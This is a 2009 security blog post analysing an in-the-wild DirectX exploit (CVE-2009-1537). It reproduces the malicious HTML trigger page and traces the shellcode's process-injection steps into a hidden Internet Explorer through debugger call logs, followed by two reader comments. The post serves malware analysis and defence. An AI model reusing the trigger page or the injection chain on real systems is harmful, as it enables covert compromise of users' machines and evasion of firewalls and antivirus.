Recent Posts
- Export Address Table Filtering (EMET v2)
- Time of check, time of use
- MalwareDomains.com Serving Malware
- Scary monsters (and super creeps)
- Happy exploit wednesday!
- All you can spray
- Update: PDF sploits in the wild
- PDF sploits in the wild
- Vuln: maildrop Group Permission Dropping Privilege ..
-
maildrop Group Permission Dropping Privilege Escalation ..
- Vuln: Quagga bgpd Null Pointer Deference Denial Of ..
-
Quagga bgpd Null Pointer Deference Denial Of Service Vul..
- Vuln: Quagga bgpd Route-Refresh Message Stack Buffe..
-
Quagga bgpd Route-Refresh Message Stack Buffer Overflow ..
Categories
Comments
- abhi:Hi, I go
- k`sOSe:sorry for that,
- ftk:can you reuploa
- Vincent:Yup, 403.
- DG:403 Forbidden f
- k`sOSe:yep, exactly. t
- Thierry :"assuming
- h4x0r:Yeahhh ! i,m w
- snip:All work and no
- testonly:hi, i tried thi
- k`sOSe:hello w0lf, tha
- w0lf:hello frist of
- k`sOSe:Hi send9, feel
- k`sOSe:heya snip, than
- send9:Nice. I don
- snip:Guido, questa m
- fXsTar:Infernet eXplod
- k`sOSe:yeah indeed, my
- nopper:w00ting club :)
- k`sOSe:well said patri
- k`sOSe:thx
- sweet :cool shit you g
- k`sOSe:Fossi in te ci
- devon:Appena fixano r
Bad guys and sexy sploits: CVE-2009-1537
Posted on 2009-07-06 21:25:51 in PornoSecurity
The vulnerability is in DirectX <=9.0c, it is currently unpatched and it is exploited in-the-wild-wild-interwebs by some bad guys. I've got a live sample a couple of days ago and I found it quite interesting.
The bug is triggered when a crafted QuickTime media file is parsed by quartz.dll and can be abused to overwrite a single byte with the fixed value of 0. This is definetely an interesting scenario for an exploit writer: you have to hijack the execution flow just by changing one byte of memory with a value you can't control!
To exploit such a vuln you need to be lucky. But, guess what... video files can be embedded in browsers... and browsers are h4x0r's best friends! :)
As you can see the value of 0 is being written to [EBP+EAX-39], EAX holds the value we control. Being EAX 0x3F, the byte overwritten will be the second byte of a saved return address. A RET instruction that will be eventually executed, instead of "returning" to the caller function, will "return" to 0x7400c619. To put in there a shellcode, the bad guys use a known .NET trick. This is how the malicious page looks like:
<HTML> <BODY> <OBJECT classid="3713d2.dll#ActiveXDotNet.DSquare"></OBJECT> <OBJECT id="target" classid="clsid:6bf52a52-394a-11d3-b153-00c04f79faa6"></OBJECT> <SCRIPT> target.URL = "d2.avi"; target.controls.play(); </SCRIPT> </BODY> </HTML>
Not surprisingly the .NET DLL has the right ImageBase attribute:
The shellcode is a quite advanced piece of code. It first retrieves the PEB and cycles through the modules list to find the image base of kernel32.dll, it actually compares each module name in the list instead of just assuming that the second entry is the right one. Instead of just resolving LoadLibrary/GetModuleHandle and GetProcAddress, it actually cycles through kernel32.dll, ntdll.dll and advapi32.dll exports to locate the following functions:
VirtualProtect GetCurrentProcess CloseHandle WaitForSingleObject GetCurrentProcessId OpenProcess VirtualAllocEx WriteProcessMemory CreateRemoteThread CreateProcessA GetEnvironmentVariableA ExitProcess ExitThread LookUpPrivilegeValueA OpenProcessToken AdjustTokenPrivileges SetThreadToken RtlExitUserThread
CreateProcessA is then used to spawn iexplore.exe. The CREATE_SUSPENDED and CREATE_NEW_CONSOLE process creation flags instruct the kernel to suspend the main thread and to create a window-less(hidden) process:
/CALL to CreateProcessA |ModuleFileName = NULL |CommandLine = "C:\Program Files\Internet Explorer\iexplore.exe" |pProcessSecurity = NULL |pThreadSecurity = NULL |InheritHandles = FALSE |CreationFlags = CREATE_SUSPENDED|CREATE_NEW_CONSOLE |pEnvironment = NULL |CurrentDir = NULL |pStartupInfo = 0199E7A8 \pProcessInfo = 0199E798
A process handle to the newly created process is acquired with OpenProcess and a payload is injected into IExplorer. CreateRemoteThread is then used with the payload address as the entrypoint(lpStartAddress):
/CALL to OpenProcess |Access = CREATE_THREAD|VM_OPERATION|VM_READ|VM_WRITE|QUERY_INFORMATION |Inheritable = FALSE \ProcessId = A38 /CALL to VirtualAllocEx |hProcess = 3F0 |lpAddress = NULL |dwSize = 5B6 |flAllocationType = 1000 \flProtext = PAGE_EXECUTE_READWRITE /CALL to WriteProcessMemory |hProcess = 3F0 |Address = 140000 |Buffer = 0199E99E |BytesToWrite = 5B6 (1462.) \pBytesWritten = NULL /CALL to CreateRemoteThread |hProcess = 3F0 |lpThreadAttributes = NULL |dwStackSize = NULL |lpStartAddress = 140000 |lpParameter = NULL |dwCreationFlag = NULL \lpThreadId = NULL
While the first process exits with a call to ExitProcess, the second instead calls home. This behaviour should look familiar, it is pretty much the same trick used by conficker: it will bypass your personal firewall because it injects code in a trusted application and your AV won't detect any suspicious disk activity.
2009-07-14 20:38:52
Thierry Zoller: "assuming that the second entry is the right one" afaik windows 7 changed the way kernel32.dll is loaded, you can't rely on it being second any longer2009-07-15 17:21:54
k`sOSe: yep, exactly. that means bad guys are windows 7 ready :)